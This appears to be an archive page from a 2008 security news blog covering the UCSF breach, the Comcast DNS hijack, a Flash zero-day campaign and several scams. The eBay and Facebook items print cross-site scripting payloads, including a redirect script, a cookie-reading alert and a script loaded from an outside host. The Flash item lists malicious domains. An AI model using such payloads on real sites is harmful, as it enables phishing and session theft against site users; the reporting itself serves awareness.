CyberInsecure.com

Archive for May, 2008

During routine University of California San Francisco (UCSF) monitoring of the campus computer network on January 11, 2008, UCSF discovered unusual data traffic on one of its computers. The investigation was completed this month and shows that an unauthorized movie-sharing program had been installed on this computer on or about December 2, 2007, by an unknown individual. The computer also held personal patient information of 3569 patients of Pathology and Laboratory Medicine. Installation of this program required high-level system access, which is why the incident is considered a security breach.

The University of California San Francisco alerted the group of patients that it has discovered a security breach after immediately removing the computer from the network to prevent further access. There is no indication that any patient files were accessed. According to UCSF, the administration takes this situation very seriously and is therefore responding with the highest level of caution and concern.

UCSF conducted a thorough investigation into the incident to assess how this breach occurred and whether any patient information may have been compromised. The data included information such as patient names, dates of pathology service, health information and, in some cases, social security numbers. The Department of Pathology has notified 2,625 UCSF patients whose information was contained on the computer. The files also included 944 patients whose tissue samples had been referred by other health care providers to UCSF for analysis.

A top-level task force has been created to improve the system of controls to protect patient information and other sensitive data. This task force is composed of campus leadership and is chaired by Executive Vice Chancellor and Provost Eugene Washington.

UCSF has established a special phone line (415) 353-7427 and a special email address PathHotline@ucsf.edu to answer questions from patients who received notification letters informing them about this recent breach.

According to Pocketgamer, it seems hackers have cracked the new N-Gage application, allowing it to work on a host of other Series 60 devices. Few online forums offer users a download link to an application saying it works on Series 60 v3 handsets including the E65, 5700 XpressMusc, the N73, N71, E51, 6110 and 6210c.

Some forums also offer a five-step process to get the application installed on these handsets, as well as installing cracked versions of N-Gage games. The forums threads has had tens of thousands of views and are claiming to offer cracked versions of N-Gage games, including System Rush Evolution, Mile High Pinball, Space Impact: Kappa Base, Asphalt 3: Street Rules, and Hooked On: Creatures of the Deep.

Nokia has recently cited its strict DRM as one of the reasons why gamers would have to re-buy their N-Gage games if they switched handsets. During its First Access beta trial, Nokia looked benignly on users trying to get the N-Gage app working on non-supported phones, claiming it showed the pent-up demand for N-Gage.

The fact that online forums are offering cracked versions of the games (all one might need to find those are 10 seconds of Google search) might be considered as a problem for Nokia. The company already aware of this issue and supposed to provide more information and details in the near future.

Comcast.net, the portal of US communications provider Comcast, was hacked on Wednesday night. As a result of the attack Comcast subscribers were unable to access their email or other services through the portal for more than two hours. Comcast is the second biggest ISP in the US and a major provider of cable TV services.

The comcast.net front page was replaced by a greeting from hackers on May 28. The defacement was removed after more than two hours. Users were then confronted by a “page under construction” message before the site was restored in the early hours of Thursday morning. The site remained intermittently unavailable even after this time. The exact mechanism of the attack is still unclear, though an injected iFrame that served up content from sites under the control of hackers is suspected. Some form of DNS redirection attack may also have been involved.

Normally defacement attacks simply involve some text message or an image on a website. However, in the case of the Comcast attack it seems some attempt may have been made to snoop on its users’ login credentials.

There are still a lot of speculations about the details of this and why this happened. The defacement was claimed by 2 hackers who left the following message on a white blank page of Comcast.net: “KRYOGENIKS Defiant and EBK RoXed COMCAST sHouTz To VIRUS Warlock elul21 coll1er seven”.

Update: Not only  the hackers hijacked Comcast’s domain name for three hours overnight, they also sent subscribers who tried to access webmail and other services to a rogue site that bragged of the exploit.

Comcast lost control of the comcast.net address after the attackers changed registration information stored by its domain registrar, Network Solutions. The unauthorized change redirected people attempting to visit the site to a page that read: “KRYOGENIKS Defiant and EBK RoXed COMCAST. sHouTz To VIRUS Warlock elul21 coll1er seven.” The page was displayed after the attackers altered the site’s IP resolution information, replacing Comcast’s IP address with the rogue address 209.62.20.186. In addition to their cryptic defacement, they altered the address for Comcast’s administrative contact to “69 dick tard lane, dildo room.”

Comcast said there was no immediate evidence that the attackers’ page tried to install malware or steal user credentials. But some reports claimed that email clients were redirected to the impostor address, requesting their login name and password.

It’s still unclear how the attackers accessed the registration settings on store with Network Solutions. A Network Solutions spokeswoman said the company is working with Comcast to figure out how the hackers obtained the login credentials to the account. Comcast is also working with unnamed law enforcement agencies to track down the attackers.

More than three months after it last update for Mac OS X, Apple released an update with numerous stability, compatibility and security fixes. Mac OS X 10.5.3, the third upgrade to Leopard since Apple launched the current in October 2007, addresses issues in several components and bundled applications. Some of these are updates for Apple and others are updates to the Open Source packages that Apple provides in it’s Operating System. Apple did not include patches for two of three iCal vulnerabilities that were made public a week ago.

Updates to the following security related modules were made:

AFP Server — Files that are not designated for sharing may be accessed remotely.

Apache — Multiple vulnerabilities in Apache 2.0.55, including cross-site scripting. Apache is updated to version 2.0.63 to address several vulnerabilities.

AppKit — Maliciously crafted file, unexpected application termination, arbitrary code execution.

Apple Pixlet Video — Vulnerability to unexpected application termination, arbitrary code execution.

ATS — Vulnerability to arbitrary code execution.

CFNetwork — Vulnerability leading to disclosure of sensitive information.

CoreFoundation — Vulnerability leading to unexpected application termination or arbitrary code execution.

CoreGraphics — Vulnerability that may lead to an unexpected application termination or arbitrary code execution.

CoreTypes — Lack of prompting against opening “certain potentially unsafe content types” in Automator, Help, Safari, and Terminal.

CUPS — Information disclosure.

Flash Player Plug-in — Arbitrary code execution, Updating to version 9.0.124.0.

Help Viewer — Vulnerability to application termination or arbitrary code execution.

iCal — Vulnerability to unexpected application termination or arbitrary code execution.

International Components for Unicode — Disclosure of sensitive information.

Image Capture — Path traversal vulnerability.

ImageIO — Out-of-bounds memory read leading to information disclosure, Multiple vulnerabilities in libpng version 1.2.18, and Vulnerability to unexpected application termination or arbitrary code execution.

Kernel — Remote vulnerability to unexpected system shutdown due to undetected failure condition and Local user vulnerability to unexpected system shutdown due to mishandling of code signatures.

LoginWindow — Race condition preventing MCX preferences being applied.

Mail — IPv6 vulnerability leading to unexpected application termination, information disclosure, or arbitrary code execution.

ruby — Remote vulnerability, updated to version 1.1.4.

Single Sign-On — Password disclosure in sso_util.

Wiki Server — Remote vulnerability to information disclosure.

Mac OS X 10.5.3 can be downloaded manually from the Apple site, or retrieved and installed using Mac OS X’s integrated update feature.

Recent Adobe Flash vulnerability is already abused in another mass compromise through another SQL injection attack. This current malware attack has been traced back to Chinese hackers, once again. They are using a zero-day exploit to infect users with password stealing malware.

This zero-day exploit taking advantage of an unknown vulnerability in Adobe Flash Player, allowing malicious users to install info stealing trojans on affected PCs. Integer overflow in Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, allows remote attackers to execute arbitrary code via a crafted SWF file with a negative Scene Count value, which passes a signed comparison, is used as an offset of a NULL pointer, and triggers a buffer overflow.

Legitimate sites were found to have been injected with scripts that lead browsers silently to sites hosting exploits for the Flash vulnerability. Upon meeting certain system conditions that allow the exploitation to commence, PCs download and execute info-stealers (like TSPY_UPACK.D) or droppers (like TROJ_DROPPER.NAK), through infected .SWF files SWF_DLOADER.YVM and SWF_DLOADER.YVN, as they are detected by TrendLabs. More patterns in this infection detected as HTML_DLDR.BF, TSPY_UPACK.D, TROJ_DROPPER.NAK, HTML_DLDR.BF, TSPY_UPACK.D, TROJ_DROPPER.NAK.

Some domains in this attack spoof the domain name of legitimate and known phone company Nokia, as well as that of the popular online game Defense of the Ancients (DotA). Other domains are lkjrc.cn and woai117.cn (obviously, since .cn domains cost about 1 cent each).

Here is a list of domains that currently serve malicious files, as posted on Dancho Danchev blog:

tongji123.org
bb.wudiliuliang.com
user1.12-26.net
user1.12-27.net
ageofconans.net
lkjrc.cn
psp1111.cn
zuoyouweinan.com
user1.isee080.net
guccime.net
woai117.cn
wuqing17173.cn
dota11.cn
play0nlnie.com
0novel.com
117276.cn
woai117.cn

At this moment there is no known patch available from Adobe, and no known workaround. Again, avoid visiting unknown sites or use Firefox with NoScript plugin.

Update (May 29): The malicious SWF file found in-the-wild has been found to affect Adobe Flash Player 9.0.115.0 and earlier, not the latest version 9.0.124.0.

Official statement by Adobe.

Users are advised to ensure that Flash is updated to version 9.0.124.0.

Adobe Flash Player is prone to an unspecified remote code-execution vulnerability. An attacker may exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Adobe Flash Player 9.0.115.0 and 9.0.124.0 are vulnerable; other versions may also be affected.

According to Symantec, this issue is being actively exploited in the wild and hence the DeepSight ThreatCon is being raised to Level 2. The flaw occurs when processing a malicious SWF file. Currently two Chinese sites are known to be hosting exploits for this flaw: wuqing17173.cn and woai117.cn. The sites appear to be exploiting the same flaw, but are using different payloads. At the moment these domains do not appear to be resolving, but they may come back in the future. Further analysis into these attacks, specifically the woai117.cn attack, uncovered another domain involved dota11.cn.

Google search reports approximately 20,000 web pages (not necessarily distinct servers or domains) injected with a script redirecting users to this malicious site. A wide variety of legitimate third-party sites appear to be affected. The code then redirects users to sites hosting malicious Flash files exploiting this issue. According to ZDNet, this zero-day flaw has been already added to the Chinese version of the MPack exploit kit.

Currently there are no vendor-supplied patches. Users are strongly advised to disable Flash until patches are available, avoid browsing to untrustworthy sites and deploy script-blocking mechanisms, such as NoScript for Firefox.

Update (May 29): The malicious SWF file found in-the-wild has been found to affect Adobe Flash Player 9.0.115.0 and earlier, not the latest version 9.0.124.0.

Official statement by Adobe.

Users are advised to ensure that Flash is updated to version 9.0.124.0.

According to XSSed report, eBay is vulnerable to cross-site scripting (XSS) that might be abused by scammers in order to take advantage of eBay users account. JavaScript code injection can redirect users to fake phishing pages where users are asked to login to their account. Victims who click on what appears to be a genuine eBay search results are also vulnerable to malware infection.

Among affected domains there are:

motors.desc.shop.ebay.com
shop.ebay.com
search.express.ebay.com
motors.shop.ebay.com

Last years cross-site scripting vulnerability on eBay could trick people into handing over their personal information to scammers. eBay promptly patched the flaw, but experts wondered how long the fix can hold. Previous flaw was exactly the same and allowed a scammer to use this type of attack to redirect people from an eBay listing to a spoofed eBay site. A year ago experts said that hackers can easily modify JavaScript code to once again trigger the same behavior and it seems they were right.

Here is the vulnerability example from XSSed:

<SCRIPT>if (top == window)location.href =’http://www.any-domain.com’</SCRIPT>

The XSS issues were submitted to XSSed by S_e_YM_e_N, Azat Harutyunyan, www.r3t.n3t.nl and Uber0n.

The vulnerability was already reported to eBay but currently remains unfixed.

Spammers have adopted Google Docs in order to gain the credibility of Google’s domain, since spam filters would not declare a Google link as spam. According to MessageLabs, this latest spammers technique is used to get around blocking and blacklisting of spam hosting domains.

Since hosted Google Docs have the domain docs.google.com, it could be possible to ban that address, but there many users of this documentation platform and there will be a high amount of blocked proper non-spam emails. A very popular way to block spam is with URL block lists, but with the name “Google” in it, it’s never going to be blocked because of all the legitimate uses.

Sending attachments like JPGs or Word .doc files has proven less than successful when compared to just sending the user a link and thats why the new misuse of Google Docs might become more popular. Spam with just a URL also isn’t foolproof. Spam filters have relied on checking the links in e-mails and blocking them based on suspicious Web addresses.

The way around this is checking the IP of the sender which might be hard for companies. Unless they can do it based on source IP, the only way to catch it is through sender IP reputation level.

There is also a good side in this technique, and it is the fact that Google Docs pages are much less dynamic than HTML. The best spammers can do is put links in the page to get victims to click through to another site. HTML code can not be embedded, no malicious IFRAME can be added, no malicious JavaScript code could run. Another problem would be creation of a lot of Google accounts. It wouldn’t be easy to do because Google has methods in place to stop automation of account creation (CAPTCHA).

MessageLabs has found am example, a typical sexual enhancement advertisement, that asked the recipient to click on the link to a Google Doc page. From the page, more links to purchase Viagra. The page was reported as spam to Google on May 8 but the page is still live.

So far, MessageLabs hasn’t seen large numbers for this method yet, but Google’s Blogspot blogging service is frequently used by spammers, so the spammers may just be getting started. Spammers still use Blogspot as an intermediate drop page, so they may refine this method a little more and stick with it, unless it fails their spamming hopes and they drop it.

There is no Google response available on this subject at this moment.

Fraudulent selling of free avast! Home Edition anti-virus are made via several web sites, many advertised via the Google AdWords program. Scam websites are offering keys to free avast! Home Edition anti-virus and charging users as if it was for the paid version of Professional Edition. When email “invoices” are received by customers, there is no mention of avast! and instead there is a list of programs that the customer has never heard of, let alone agreed to buy.

Such websites are in no way associated with avast! developer (ALWIL Software), and have no way to issue licenses. Any money you spend with them will not allow them to issue a genuine paid-for license. One way to spot a fraudulent site is via a message at the bottom of the website, often in small lettering:

This website has no affiliation whatsoever with the owner of this software program, and provides ONLY a link to the software program.

Another way to spot these scam sites, is the fact that they will often make mention of offering a “lifetime” license or “Gold Package”. These packages do not really exist for the avast! anti-virus.

Here is a list of known scam sites. None of the below sites have any connection with ALWIL Software and are not authorized resellers of avast!:

www.downloadavast.com
www.avast-downloads.com
avast.free-software-center.com
www.avast-hq.com
www.downloadservicearea.com (DOWNLOADSERV.COM)
download-this.us/avast
www.DownloadAvast.com
www.Avast-Downloads.com
www.avast-2007.com
download-avast.com
www.avast-home.info
www.avasthome.info
www.download-zone-free.com
www.downloadsglobe.com/avast
www.freedownloadspace.com
www.free-download-center.com
free-program-download.com
www.freedownloadpage.com
avast-download-now.com
www.mysoftwaredownloads.com
IP-MyDowloadSite.com
www.thesoftwaremembersarea.com
www.downloadinghome.com
www.bundleway.com

“Download Assist (My Downloading)”, “Market Bill” and “mywebcs” might appear as payment descriptor on your credit card if you have purchased from one of these sites.

Some of those sites are offering free avast! Home Edition wrapped in a new installer which requires a premium rate SMS to be sent in order to gain a license key.

Avast! advises customers to contact their credit card issuer if they have purchased from one of these sites, and report the transaction as fraudulent. This will allow the credit card company to instigate a chargeback against the site, returning money to customers. Customers may also wish to contact their local law enforcement organization for statistical monitoring purposes. Customers who cannot confirm where their purchase has been made are encouraged to contact avast! sales if they have any doubts as to the validity of such purchases.

According to XSSed, Facebook is vulnerable to a cross site scripting flaw that leaves its users at risk from scripting attacks and logins phishing. The security blog has posted a proof of concept demo of a flaw on the social networking website that could leave surfers vulnerable to malware. Attackers can also trick users into handing over their credentials through fake logins served up from third party sites.

Here is a harmless proof of concept, shown at XSSed:

http://www.facebook.com/jobs/position.php?st=
%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe
%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.facebook.com/jobs/position.php?st=
%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

Security watchers say that malware authors, spammers and scammers are paying increasing attention to social networking websites. This recent Facebook vulnerability comes shortly after the cross-site scripting exposure on Paypal.com.

Additional warnings of this kind of vulnerability come as network security firm Sophos detected a 419 scam email on business-focused social networking site LinkedIn earlier this week.

At this moment the flaw is still open. Facebook has been already notified of the vulnerability.

Update (May 27):  Facebook has fixed this vulnerability a couple of days ago.

According to security vendor Core Security Technologies, Apple’s iCal calendar application contains three vulnerabilities that could allow an attacker to crash the application or execute remote code on the victim’s Mac. Core Security released an advisory on Wednesday detailing the vulnerabilities, which affect iCal version 3.0.1 running under Mac OS X 10.5.1 (Leopard).

In order for an attacker to exploit these vulnerabilities, an iCal user must be convinced to open an .ics file sent via e-mail or hosted on a Web server. The ability to add or modify files on a CalDAV server would allow the attacker to trigger the exploits directly. This is the most serious of three vulnerabilities and is possible due to potential memory corruption resulting from a resource liberation bug.

The other two vulnerabilities could be used to crash iCal using a maliciously crafted iCal (.ics) file. There is a possibility to use these two flaws for execution of arbitrary code but so far there is no proof such an attack is possible.

Core Security notified Apple of the vulnerabilities back in January. In February, Apple said it would fix the bugs in its March security patch, but it didn’t. Core Security then rescheduled publication of information about the vulnerabilities for April. So far Apple did not address the vulnerabilities and Core said it is about to publish the information to the public.

Spammers and scammers are always ready to jump on the latest disaster or big news headline to try and exploit users. This time its time to exploit the Chinese earthquake disaster, which killed more than 50,000, to push scams and malware spam.

In one report scammers sent out text messages enticing people to send donations to fund the aid for helpless victims. Today there was a report of spam message allegedly from a Filipino seeking financial aid to follow his wounded wife in China.

Here are the first and last portions of the long-winded letter designed to get merciful recipients to take action, i.e. donate money. It starts with:

Dear friend,

I do not know your exact name. I can only guess. I ask you to read through my letter up to the end.

And ends:

And still, if you will be able to help me I shall consider you to be the best man in this world. You will save a life of mine Jin. I shall write the data on which I will be able to receive cashes in Philippines through Western Union.

Next there are emails with infected Word attachments that include MalDoc-Fam Trojan. They being distributed in messages that pose as news about the disaster, net security firm Sophos reports. The malware-tainted emails typically appear with body text suggesting they contain news from China’s official press agency, Xinhua:

BEIJING, May 20 (Xinhua) — The death toll from the earthquake in southwest China’s Sichuan Province has risen to 34,074 nationwide as of 2 p.m. Saturday, while 198,347 people were injured, according to the Information Office of the State Council. Pay attention to attachment for more.

Opening the attached Word document triggers an exploit that downloads malware onto vulnerable Windows PCs. The MalDoc-Fam Trojan is more than a year old, dating from March 2007.

These schemes, much like during those that surfaced during previous tragedies, are surely only some of the many that will continue to use this ploy.

Recent reports tell that even the official Web site for donations to the eathquake victims in China, the Chinese Red Cross, has itself been hacked to divert donations elsewhere. Ironically, even if you carefully donate only to legitimate organizations, you can never be sure who will actually get the money nowadays.

Users should be extremely cautious in extending their help. If possible, keep a closer watch of who gets the donation and where it goes.